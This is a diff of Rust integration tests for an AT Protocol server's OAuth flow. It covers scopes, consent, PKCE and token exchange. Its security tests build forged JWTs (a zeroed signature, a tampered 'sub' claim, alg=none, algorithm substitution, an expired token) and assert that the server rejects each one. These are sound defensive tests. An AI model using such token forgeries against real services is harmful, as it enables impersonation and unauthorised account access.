.unwrap();
612
let par_body1: Value = par_res1.json().await.unwrap();
613
let request_uri1 = par_body1["request_uri"].as_str().unwrap();
614
+
let auth_res1 = http_client
615
.post(format!("{}/oauth/authorize", url))
616
+
.header("Content-Type", "application/json")
617
+
.header("Accept", "application/json")
618
+
.json(&json!({
619
+
"request_uri": request_uri1,
620
+
"username": &handle,
621
+
"password": password,
622
+
"remember_device": false
623
+
}))
624
.send()
625
.await
626
.unwrap();
627
+
assert_eq!(auth_res1.status(), StatusCode::OK);
628
+
let auth_body1: Value = auth_res1.json().await.unwrap();
629
+
let mut location1 = auth_body1["redirect_uri"].as_str().unwrap().to_string();
630
+
if location1.contains("/oauth/consent") {
631
+
let consent_res = http_client
632
+
.post(format!("{}/oauth/authorize/consent", url))
633
+
.header("Content-Type", "application/json")
634
+
.json(&json!({"request_uri": request_uri1, "approved_scopes": ["atproto"], "remember": false}))
635
+
.send().await.unwrap();
636
+
let consent_body: Value = consent_res.json().await.unwrap();
637
+
location1 = consent_body["redirect_uri"].as_str().unwrap().to_string();
638
+
}
639
let code1 = location1
640
.split("code=")
641
.nth(1)
···
672
.unwrap();
673
let par_body2: Value = par_res2.json().await.unwrap();
674
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
675
+
let auth_res2 = http_client
676
.post(format!("{}/oauth/authorize", url))
677
+
.header("Content-Type", "application/json")
678
+
.header("Accept", "application/json")
679
+
.json(&json!({
680
+
"request_uri": request_uri2,
681
+
"username": &handle,
682
+
"password": password,
683
+
"remember_device": false
684
+
}))
685
.send()
686
.await
687
.unwrap();
688
+
assert_eq!(auth_res2.status(), StatusCode::OK);
689
+
let auth_body2: Value = auth_res2.json().await.unwrap();
690
+
let mut location2 = auth_body2["redirect_uri"].as_str().unwrap().to_string();
691
+
if location2.contains("/oauth/consent") {
692
+
let consent_res = http_client
693
+
.post(format!("{}/oauth/authorize/consent", url))
694
+
.header("Content-Type", "application/json")
695
+
.json(&json!({"request_uri": request_uri2, "approved_scopes": ["atproto"], "remember": false}))
696
+
.send().await.unwrap();
697
+
let consent_body: Value = consent_res.json().await.unwrap();
698
+
location2 = consent_body["redirect_uri"].as_str().unwrap().to_string();
699
+
}
700
let code2 = location2
701
.split("code=")
702
.nth(1)
+753
tests/oauth_scopes.rs
+753
tests/oauth_scopes.rs
···
···
1
+
mod common;
2
+
mod helpers;
3
+
4
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
5
+
use chrono::Utc;
6
+
use common::{base_url, client};
7
+
use helpers::verify_new_account;
8
+
use reqwest::StatusCode;
9
+
use serde_json::{Value, json};
10
+
use sha2::{Digest, Sha256};
11
+
use wiremock::matchers::{method, path};
12
+
use wiremock::{Mock, MockServer, ResponseTemplate};
13
+
14
+
fn generate_pkce() -> (String, String) {
15
+
let verifier_bytes: [u8; 32] = rand::random();
16
+
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
17
+
let mut hasher = Sha256::new();
18
+
hasher.update(code_verifier.as_bytes());
19
+
let hash = hasher.finalize();
20
+
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
21
+
(code_verifier, code_challenge)
22
+
}
23
+
24
+
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
25
+
let mock_server = MockServer::start().await;
26
+
let client_id = mock_server.uri();
27
+
let metadata = json!({
28
+
"client_id": client_id,
29
+
"client_name": "Test OAuth Scope Client",
30
+
"redirect_uris": [redirect_uri],
31
+
"grant_types": ["authorization_code", "refresh_token"],
32
+
"response_types": ["code"],
33
+
"token_endpoint_auth_method": "none",
34
+
"dpop_bound_access_tokens": false
35
+
});
36
+
Mock::given(method("GET"))
37
+
.and(path("/"))
38
+
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
39
+
.mount(&mock_server)
40
+
.await;
41
+
mock_server
42
+
}
43
+
44
+
struct OAuthSession {
45
+
access_token: String,
46
+
#[allow(dead_code)]
47
+
refresh_token: String,
48
+
did: String,
49
+
#[allow(dead_code)]
50
+
client_id: String,
51
+
scope: String,
52
+
}
53
+
54
+
async fn create_user_and_oauth_session_with_scope(
55
+
handle_prefix: &str,
56
+
redirect_uri: &str,
57
+
scope: &str,
58
+
) -> (OAuthSession, MockServer) {
59
+
let url = base_url().await;
60
+
let http_client = client();
61
+
let ts = Utc::now().timestamp_millis();
62
+
let handle = format!("{}-{}", handle_prefix, ts);
63
+
let email = format!("{}-{}@example.com", handle_prefix, ts);
64
+
let password = format!("{}-password", handle_prefix);
65
+
66
+
let create_res = http_client
67
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
68
+
.json(&json!({
69
+
"handle": handle,
70
+
"email": email,
71
+
"password": password
72
+
}))
73
+
.send()
74
+
.await
75
+
.expect("Account creation failed");
76
+
assert_eq!(create_res.status(), StatusCode::OK);
77
+
let account: Value = create_res.json().await.unwrap();
78
+
let user_did = account["did"].as_str().unwrap().to_string();
79
+
80
+
let _ = verify_new_account(&http_client, &user_did).await;
81
+
82
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
83
+
let client_id = mock_client.uri();
84
+
let (code_verifier, code_challenge) = generate_pkce();
85
+
86
+
let par_res = http_client
87
+
.post(format!("{}/oauth/par", url))
88
+
.form(&[
89
+
("response_type", "code"),
90
+
("client_id", &client_id),
91
+
("redirect_uri", redirect_uri),
92
+
("code_challenge", &code_challenge),
93
+
("code_challenge_method", "S256"),
94
+
("scope", scope),
95
+
])
96
+
.send()
97
+
.await
98
+
.expect("PAR failed");
99
+
assert!(
100
+
par_res.status() == StatusCode::OK || par_res.status() == StatusCode::CREATED,
101
+
"PAR should succeed, got {}",
102
+
par_res.status()
103
+
);
104
+
let par_body: Value = par_res.json().await.unwrap();
105
+
let request_uri = par_body["request_uri"].as_str().unwrap();
106
+
107
+
let auth_res = http_client
108
+
.post(format!("{}/oauth/authorize", url))
109
+
.header("Content-Type", "application/json")
110
+
.header("Accept", "application/json")
111
+
.json(&json!({
112
+
"request_uri": request_uri,
113
+
"username": &handle,
114
+
"password": &password,
115
+
"remember_device": false
116
+
}))
117
+
.send()
118
+
.await
119
+
.expect("Authorize failed");
120
+
assert_eq!(
121
+
auth_res.status(),
122
+
StatusCode::OK,
123
+
"Authorize should return OK"
124
+
);
125
+
let auth_body: Value = auth_res.json().await.unwrap();
126
+
let mut location = auth_body["redirect_uri"]
127
+
.as_str()
128
+
.expect("Expected redirect_uri")
129
+
.to_string();
130
+
if location.contains("/oauth/consent") {
131
+
let consent_res = http_client
132
+
.post(format!("{}/oauth/authorize/consent", url))
133
+
.header("Content-Type", "application/json")
134
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
135
+
.send().await.expect("Consent request failed");
136
+
assert_eq!(
137
+
consent_res.status(),
138
+
StatusCode::OK,
139
+
"Consent should succeed"
140
+
);
141
+
let consent_body: Value = consent_res.json().await.unwrap();
142
+
location = consent_body["redirect_uri"]
143
+
.as_str()
144
+
.expect("Expected redirect_uri from consent")
145
+
.to_string();
146
+
}
147
+
let code = location
148
+
.split("code=")
149
+
.nth(1)
150
+
.unwrap()
151
+
.split('&')
152
+
.next()
153
+
.unwrap();
154
+
155
+
let token_res = http_client
156
+
.post(format!("{}/oauth/token", url))
157
+
.form(&[
158
+
("grant_type", "authorization_code"),
159
+
("code", code),
160
+
("redirect_uri", redirect_uri),
161
+
("code_verifier", &code_verifier),
162
+
("client_id", &client_id),
163
+
])
164
+
.send()
165
+
.await
166
+
.expect("Token request failed");
167
+
assert_eq!(token_res.status(), StatusCode::OK);
168
+
let token_body: Value = token_res.json().await.unwrap();
169
+
170
+
let session = OAuthSession {
171
+
access_token: token_body["access_token"].as_str().unwrap().to_string(),
172
+
refresh_token: token_body["refresh_token"].as_str().unwrap().to_string(),
173
+
did: user_did,
174
+
client_id,
175
+
scope: scope.to_string(),
176
+
};
177
+
(session, mock_client)
178
+
}
179
+
180
+
#[tokio::test]
181
+
async fn test_atproto_scope_allows_full_access() {
182
+
let url = base_url().await;
183
+
let http_client = client();
184
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
185
+
"scope-full",
186
+
"https://example.com/callback",
187
+
"atproto",
188
+
)
189
+
.await;
190
+
191
+
let collection = "app.bsky.feed.post";
192
+
let create_res = http_client
193
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
194
+
.bearer_auth(&session.access_token)
195
+
.json(&json!({
196
+
"repo": session.did,
197
+
"collection": collection,
198
+
"record": {
199
+
"$type": collection,
200
+
"text": "Full access post",
201
+
"createdAt": Utc::now().to_rfc3339()
202
+
}
203
+
}))
204
+
.send()
205
+
.await
206
+
.unwrap();
207
+
208
+
assert_eq!(
209
+
create_res.status(),
210
+
StatusCode::OK,
211
+
"atproto scope should allow creating records"
212
+
);
213
+
let create_body: Value = create_res.json().await.unwrap();
214
+
let rkey = create_body["uri"]
215
+
.as_str()
216
+
.unwrap()
217
+
.split('/')
218
+
.last()
219
+
.unwrap();
220
+
221
+
let put_res = http_client
222
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", url))
223
+
.bearer_auth(&session.access_token)
224
+
.json(&json!({
225
+
"repo": session.did,
226
+
"collection": collection,
227
+
"rkey": rkey,
228
+
"record": {
229
+
"$type": collection,
230
+
"text": "Updated post",
231
+
"createdAt": Utc::now().to_rfc3339()
232
+
}
233
+
}))
234
+
.send()
235
+
.await
236
+
.unwrap();
237
+
assert_eq!(
238
+
put_res.status(),
239
+
StatusCode::OK,
240
+
"atproto scope should allow updating records"
241
+
);
242
+
243
+
let delete_res = http_client
244
+
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url))
245
+
.bearer_auth(&session.access_token)
246
+
.json(&json!({
247
+
"repo": session.did,
248
+
"collection": collection,
249
+
"rkey": rkey
250
+
}))
251
+
.send()
252
+
.await
253
+
.unwrap();
254
+
assert_eq!(
255
+
delete_res.status(),
256
+
StatusCode::OK,
257
+
"atproto scope should allow deleting records"
258
+
);
259
+
}
260
+
261
+
#[tokio::test]
262
+
async fn test_atproto_scope_allows_blob_upload() {
263
+
let url = base_url().await;
264
+
let http_client = client();
265
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
266
+
"scope-blob",
267
+
"https://example.com/callback",
268
+
"atproto",
269
+
)
270
+
.await;
271
+
272
+
let blob_data = b"Test blob data for scope test";
273
+
let upload_res = http_client
274
+
.post(format!("{}/xrpc/com.atproto.repo.uploadBlob", url))
275
+
.bearer_auth(&session.access_token)
276
+
.header("Content-Type", "text/plain")
277
+
.body(blob_data.to_vec())
278
+
.send()
279
+
.await
280
+
.unwrap();
281
+
282
+
assert_eq!(
283
+
upload_res.status(),
284
+
StatusCode::OK,
285
+
"atproto scope should allow blob upload"
286
+
);
287
+
let upload_body: Value = upload_res.json().await.unwrap();
288
+
assert!(upload_body["blob"]["ref"]["$link"].is_string());
289
+
}
290
+
291
+
#[tokio::test]
292
+
async fn test_atproto_scope_allows_batch_writes() {
293
+
let url = base_url().await;
294
+
let http_client = client();
295
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
296
+
"scope-batch",
297
+
"https://example.com/callback",
298
+
"atproto",
299
+
)
300
+
.await;
301
+
302
+
let collection = "app.bsky.feed.post";
303
+
let now = Utc::now().to_rfc3339();
304
+
let apply_res = http_client
305
+
.post(format!("{}/xrpc/com.atproto.repo.applyWrites", url))
306
+
.bearer_auth(&session.access_token)
307
+
.json(&json!({
308
+
"repo": session.did,
309
+
"writes": [
310
+
{
311
+
"$type": "com.atproto.repo.applyWrites#create",
312
+
"collection": collection,
313
+
"rkey": "batch-scope-1",
314
+
"value": {
315
+
"$type": collection,
316
+
"text": "Batch post 1",
317
+
"createdAt": now
318
+
}
319
+
},
320
+
{
321
+
"$type": "com.atproto.repo.applyWrites#create",
322
+
"collection": collection,
323
+
"rkey": "batch-scope-2",
324
+
"value": {
325
+
"$type": collection,
326
+
"text": "Batch post 2",
327
+
"createdAt": now
328
+
}
329
+
}
330
+
]
331
+
}))
332
+
.send()
333
+
.await
334
+
.unwrap();
335
+
336
+
assert_eq!(
337
+
apply_res.status(),
338
+
StatusCode::OK,
339
+
"atproto scope should allow batch writes"
340
+
);
341
+
}
342
+
343
+
#[tokio::test]
344
+
async fn test_transition_generic_scope_allows_access() {
345
+
let url = base_url().await;
346
+
let http_client = client();
347
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
348
+
"scope-transition",
349
+
"https://example.com/callback",
350
+
"atproto transition:generic",
351
+
)
352
+
.await;
353
+
354
+
let collection = "app.bsky.feed.post";
355
+
let create_res = http_client
356
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
357
+
.bearer_auth(&session.access_token)
358
+
.json(&json!({
359
+
"repo": session.did,
360
+
"collection": collection,
361
+
"record": {
362
+
"$type": collection,
363
+
"text": "Post with transition scope",
364
+
"createdAt": Utc::now().to_rfc3339()
365
+
}
366
+
}))
367
+
.send()
368
+
.await
369
+
.unwrap();
370
+
371
+
assert_eq!(
372
+
create_res.status(),
373
+
StatusCode::OK,
374
+
"transition:generic scope combined with atproto should work"
375
+
);
376
+
}
377
+
378
+
#[tokio::test]
379
+
async fn test_consent_endpoint_returns_scope_info() {
380
+
let url = base_url().await;
381
+
let http_client = client();
382
+
383
+
let ts = Utc::now().timestamp_millis();
384
+
let handle = format!("consent-test-{}", ts);
385
+
let email = format!("consent-{}@example.com", ts);
386
+
let password = "consent-password";
387
+
let redirect_uri = "https://consent-test.example.com/callback";
388
+
389
+
let create_res = http_client
390
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
391
+
.json(&json!({
392
+
"handle": handle,
393
+
"email": email,
394
+
"password": password
395
+
}))
396
+
.send()
397
+
.await
398
+
.unwrap();
399
+
assert_eq!(create_res.status(), StatusCode::OK);
400
+
let account: Value = create_res.json().await.unwrap();
401
+
let user_did = account["did"].as_str().unwrap();
402
+
let _ = verify_new_account(&http_client, user_did).await;
403
+
404
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
405
+
let client_id = mock_client.uri();
406
+
let (_, code_challenge) = generate_pkce();
407
+
408
+
let par_res = http_client
409
+
.post(format!("{}/oauth/par", url))
410
+
.form(&[
411
+
("response_type", "code"),
412
+
("client_id", &client_id),
413
+
("redirect_uri", redirect_uri),
414
+
("code_challenge", &code_challenge),
415
+
("code_challenge_method", "S256"),
416
+
("scope", "atproto transition:generic"),
417
+
])
418
+
.send()
419
+
.await
420
+
.unwrap();
421
+
let par_body: Value = par_res.json().await.unwrap();
422
+
let request_uri = par_body["request_uri"].as_str().unwrap();
423
+
424
+
let auth_res = http_client
425
+
.post(format!("{}/oauth/authorize", url))
426
+
.header("Accept", "application/json")
427
+
.json(&json!({
428
+
"request_uri": request_uri,
429
+
"username": &handle,
430
+
"password": password,
431
+
"remember_device": false
432
+
}))
433
+
.send()
434
+
.await
435
+
.unwrap();
436
+
assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed");
437
+
438
+
let consent_res = http_client
439
+
.get(format!("{}/oauth/authorize/consent", url))
440
+
.query(&[("request_uri", request_uri)])
441
+
.send()
442
+
.await
443
+
.unwrap();
444
+
445
+
assert_eq!(consent_res.status(), StatusCode::OK);
446
+
let consent_body: Value = consent_res.json().await.unwrap();
447
+
448
+
assert_eq!(consent_body["client_id"], client_id);
449
+
assert_eq!(consent_body["did"], user_did);
450
+
assert!(consent_body["scopes"].is_array());
451
+
452
+
let scopes = consent_body["scopes"].as_array().unwrap();
453
+
assert!(!scopes.is_empty(), "Should have scopes in response");
454
+
455
+
let atproto_scope = scopes.iter().find(|s| s["scope"] == "atproto");
456
+
assert!(atproto_scope.is_some(), "Should include atproto scope");
457
+
let atproto = atproto_scope.unwrap();
458
+
assert_eq!(atproto["required"], true, "atproto should be required");
459
+
assert!(atproto["description"].is_string());
460
+
assert!(atproto["display_name"].is_string());
461
+
462
+
let transition_scope = scopes.iter().find(|s| s["scope"] == "transition:generic");
463
+
assert!(
464
+
transition_scope.is_some(),
465
+
"Should include transition:generic scope"
466
+
);
467
+
let transition = transition_scope.unwrap();
468
+
assert_eq!(
469
+
transition["required"], false,
470
+
"transition:generic should be optional"
471
+
);
472
+
}
473
+
474
+
#[tokio::test]
475
+
async fn test_consent_post_generates_code() {
476
+
let url = base_url().await;
477
+
let http_client = client();
478
+
479
+
let ts = Utc::now().timestamp_millis();
480
+
let handle = format!("consent-post-{}", ts);
481
+
let email = format!("consent-post-{}@example.com", ts);
482
+
let password = "consent-post-password";
483
+
let redirect_uri = "https://consent-post.example.com/callback";
484
+
485
+
let create_res = http_client
486
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
487
+
.json(&json!({
488
+
"handle": handle,
489
+
"email": email,
490
+
"password": password
491
+
}))
492
+
.send()
493
+
.await
494
+
.unwrap();
495
+
assert_eq!(create_res.status(), StatusCode::OK);
496
+
let account: Value = create_res.json().await.unwrap();
497
+
let user_did = account["did"].as_str().unwrap();
498
+
let _ = verify_new_account(&http_client, user_did).await;
499
+
500
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
501
+
let client_id = mock_client.uri();
502
+
let (code_verifier, code_challenge) = generate_pkce();
503
+
504
+
let par_res = http_client
505
+
.post(format!("{}/oauth/par", url))
506
+
.form(&[
507
+
("response_type", "code"),
508
+
("client_id", &client_id),
509
+
("redirect_uri", redirect_uri),
510
+
("code_challenge", &code_challenge),
511
+
("code_challenge_method", "S256"),
512
+
("scope", "atproto"),
513
+
])
514
+
.send()
515
+
.await
516
+
.unwrap();
517
+
let par_body: Value = par_res.json().await.unwrap();
518
+
let request_uri = par_body["request_uri"].as_str().unwrap();
519
+
520
+
let auth_res = http_client
521
+
.post(format!("{}/oauth/authorize", url))
522
+
.header("Accept", "application/json")
523
+
.json(&json!({
524
+
"request_uri": request_uri,
525
+
"username": &handle,
526
+
"password": password,
527
+
"remember_device": false
528
+
}))
529
+
.send()
530
+
.await
531
+
.unwrap();
532
+
assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed");
533
+
534
+
let consent_post_res = http_client
535
+
.post(format!("{}/oauth/authorize/consent", url))
536
+
.json(&json!({
537
+
"request_uri": request_uri,
538
+
"approved_scopes": ["atproto"],
539
+
"remember": false
540
+
}))
541
+
.send()
542
+
.await
543
+
.unwrap();
544
+
545
+
assert_eq!(consent_post_res.status(), StatusCode::OK);
546
+
let consent_body: Value = consent_post_res.json().await.unwrap();
547
+
assert!(
548
+
consent_body["redirect_uri"].is_string(),
549
+
"Should return redirect URI"
550
+
);
551
+
552
+
let redirect_uri_response = consent_body["redirect_uri"].as_str().unwrap();
553
+
assert!(
554
+
redirect_uri_response.contains("code="),
555
+
"Redirect URI should contain authorization code"
556
+
);
557
+
558
+
let code = redirect_uri_response
559
+
.split("code=")
560
+
.nth(1)
561
+
.unwrap()
562
+
.split('&')
563
+
.next()
564
+
.unwrap();
565
+
566
+
let token_res = http_client
567
+
.post(format!("{}/oauth/token", url))
568
+
.form(&[
569
+
("grant_type", "authorization_code"),
570
+
("code", code),
571
+
("redirect_uri", redirect_uri),
572
+
("code_verifier", &code_verifier),
573
+
("client_id", &client_id),
574
+
])
575
+
.send()
576
+
.await
577
+
.unwrap();
578
+
579
+
assert_eq!(
580
+
token_res.status(),
581
+
StatusCode::OK,
582
+
"Token exchange should succeed"
583
+
);
584
+
let token_body: Value = token_res.json().await.unwrap();
585
+
assert!(token_body["access_token"].is_string());
586
+
}
587
+
588
+
#[tokio::test]
589
+
async fn test_consent_post_requires_atproto_scope() {
590
+
let url = base_url().await;
591
+
let http_client = client();
592
+
593
+
let ts = Utc::now().timestamp_millis();
594
+
let handle = format!("consent-req-{}", ts);
595
+
let email = format!("consent-req-{}@example.com", ts);
596
+
let password = "consent-req-password";
597
+
let redirect_uri = "https://consent-req.example.com/callback";
598
+
599
+
let create_res = http_client
600
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
601
+
.json(&json!({
602
+
"handle": handle,
603
+
"email": email,
604
+
"password": password
605
+
}))
606
+
.send()
607
+
.await
608
+
.unwrap();
609
+
assert_eq!(create_res.status(), StatusCode::OK);
610
+
let account: Value = create_res.json().await.unwrap();
611
+
let user_did = account["did"].as_str().unwrap();
612
+
let _ = verify_new_account(&http_client, user_did).await;
613
+
614
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
615
+
let client_id = mock_client.uri();
616
+
let (_, code_challenge) = generate_pkce();
617
+
618
+
let par_res = http_client
619
+
.post(format!("{}/oauth/par", url))
620
+
.form(&[
621
+
("response_type", "code"),
622
+
("client_id", &client_id),
623
+
("redirect_uri", redirect_uri),
624
+
("code_challenge", &code_challenge),
625
+
("code_challenge_method", "S256"),
626
+
("scope", "atproto transition:generic"),
627
+
])
628
+
.send()
629
+
.await
630
+
.unwrap();
631
+
let par_body: Value = par_res.json().await.unwrap();
632
+
let request_uri = par_body["request_uri"].as_str().unwrap();
633
+
634
+
let auth_res = http_client
635
+
.post(format!("{}/oauth/authorize", url))
636
+
.header("Accept", "application/json")
637
+
.json(&json!({
638
+
"request_uri": request_uri,
639
+
"username": &handle,
640
+
"password": password,
641
+
"remember_device": false
642
+
}))
643
+
.send()
644
+
.await
645
+
.unwrap();
646
+
assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed");
647
+
648
+
let consent_post_res = http_client
649
+
.post(format!("{}/oauth/authorize/consent", url))
650
+
.json(&json!({
651
+
"request_uri": request_uri,
652
+
"approved_scopes": ["transition:generic"],
653
+
"remember": false
654
+
}))
655
+
.send()
656
+
.await
657
+
.unwrap();
658
+
659
+
assert_eq!(
660
+
consent_post_res.status(),
661
+
StatusCode::BAD_REQUEST,
662
+
"Should reject consent without atproto scope"
663
+
);
664
+
let error_body: Value = consent_post_res.json().await.unwrap();
665
+
assert!(
666
+
error_body["error_description"]
667
+
.as_str()
668
+
.unwrap()
669
+
.contains("atproto")
670
+
);
671
+
}
672
+
673
+
#[tokio::test]
674
+
async fn test_token_contains_requested_scope() {
675
+
let scope = "atproto transition:generic";
676
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
677
+
"scope-token",
678
+
"https://example.com/callback",
679
+
scope,
680
+
)
681
+
.await;
682
+
683
+
assert_eq!(
684
+
session.scope, scope,
685
+
"Session should have the requested scope"
686
+
);
687
+
688
+
let parts: Vec<&str> = session.access_token.split('.').collect();
689
+
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
690
+
691
+
let payload_json = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
692
+
let payload: Value = serde_json::from_slice(&payload_json).unwrap();
693
+
694
+
assert!(
695
+
payload["scope"].is_string(),
696
+
"Token payload should contain scope"
697
+
);
698
+
let token_scope = payload["scope"].as_str().unwrap();
699
+
assert!(
700
+
token_scope.contains("atproto"),
701
+
"Token scope should contain atproto"
702
+
);
703
+
}
704
+
705
+
#[tokio::test]
706
+
async fn test_dereference_scope_endpoint() {
707
+
let url = base_url().await;
708
+
let http_client = client();
709
+
let (session, _mock) = create_user_and_oauth_session_with_scope(
710
+
"scope-deref",
711
+
"https://example.com/callback",
712
+
"atproto",
713
+
)
714
+
.await;
715
+
716
+
let deref_res = http_client
717
+
.post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url))
718
+
.bearer_auth(&session.access_token)
719
+
.json(&json!({
720
+
"scope": "atproto transition:generic"
721
+
}))
722
+
.send()
723
+
.await
724
+
.unwrap();
725
+
726
+
assert_eq!(deref_res.status(), StatusCode::OK);
727
+
let deref_body: Value = deref_res.json().await.unwrap();
728
+
assert!(deref_body["scope"].is_string());
729
+
let resolved_scope = deref_body["scope"].as_str().unwrap();
730
+
assert!(resolved_scope.contains("atproto"));
731
+
assert!(resolved_scope.contains("transition:generic"));
732
+
}
733
+
734
+
#[tokio::test]
735
+
async fn test_dereference_scope_requires_auth() {
736
+
let url = base_url().await;
737
+
let http_client = client();
738
+
739
+
let deref_res = http_client
740
+
.post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url))
741
+
.json(&json!({
742
+
"scope": "atproto"
743
+
}))
744
+
.send()
745
+
.await
746
+
.unwrap();
747
+
748
+
assert_eq!(
749
+
deref_res.status(),
750
+
StatusCode::UNAUTHORIZED,
751
+
"Should require authentication"
752
+
);
753
+
}
+769
-181
tests/oauth_security.rs
+769
-181
tests/oauth_security.rs
···
2
mod common;
3
mod helpers;
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
5
-
use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint};
6
use chrono::Utc;
7
use common::{base_url, client};
8
use helpers::verify_new_account;
9
-
use reqwest::{StatusCode, redirect};
10
use serde_json::{Value, json};
11
use sha2::{Digest, Sha256};
12
use wiremock::matchers::{method, path};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
-
15
-
fn no_redirect_client() -> reqwest::Client {
16
-
reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap()
17
-
}
18
19
fn generate_pkce() -> (String, String) {
20
let verifier_bytes: [u8; 32] = rand::random();
···
36
"token_endpoint_auth_method": "none",
37
"dpop_bound_access_tokens": false
38
});
39
-
Mock::given(method("GET")).and(path("/"))
40
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
41
-
.mount(&mock_server).await;
42
mock_server
43
}
44
···
55
let mock_client = setup_mock_client_metadata(redirect_uri).await;
56
let client_id = mock_client.uri();
57
let (code_verifier, code_challenge) = generate_pkce();
58
-
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
59
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
60
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
61
-
.send().await.unwrap().json().await.unwrap();
62
let request_uri = par_body["request_uri"].as_str().unwrap();
63
-
let auth_client = no_redirect_client();
64
-
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
65
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "security-test-password"), ("remember_device", "false")])
66
.send().await.unwrap();
67
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
68
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
69
-
let token_body: Value = http_client.post(format!("{}/oauth/token", url))
70
-
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
71
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
72
-
.send().await.unwrap().json().await.unwrap();
73
-
(token_body["access_token"].as_str().unwrap().to_string(),
74
-
token_body["refresh_token"].as_str().unwrap().to_string(), client_id)
75
}
76
77
#[tokio::test]
···
83
assert_eq!(parts.len(), 3);
84
let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]);
85
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig);
86
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
87
-
.bearer_auth(&forged_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
88
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
89
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
90
payload["sub"] = json!("did:plc:attacker");
91
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
92
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
93
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
94
-
.bearer_auth(&modified_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
95
let none_header = json!({ "alg": "none", "typ": "at+jwt" });
96
let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds",
97
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" });
98
-
let none_token = format!("{}.{}.", URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()),
99
-
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()));
100
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
101
-
.bearer_auth(&none_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "alg=none should be rejected");
102
let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" });
103
-
let rs256_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()),
104
-
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 64]));
105
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
106
-
.bearer_auth(&rs256_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Algorithm substitution should be rejected");
107
let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds",
108
"iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" });
109
-
let expired_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()),
110
-
URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32]));
111
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
112
-
.bearer_auth(&expired_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
113
}
114
115
#[tokio::test]
···
119
let redirect_uri = "https://example.com/pkce-callback";
120
let mock_client = setup_mock_client_metadata(redirect_uri).await;
121
let client_id = mock_client.uri();
122
-
let res = http_client.post(format!("{}/oauth/par", url))
123
-
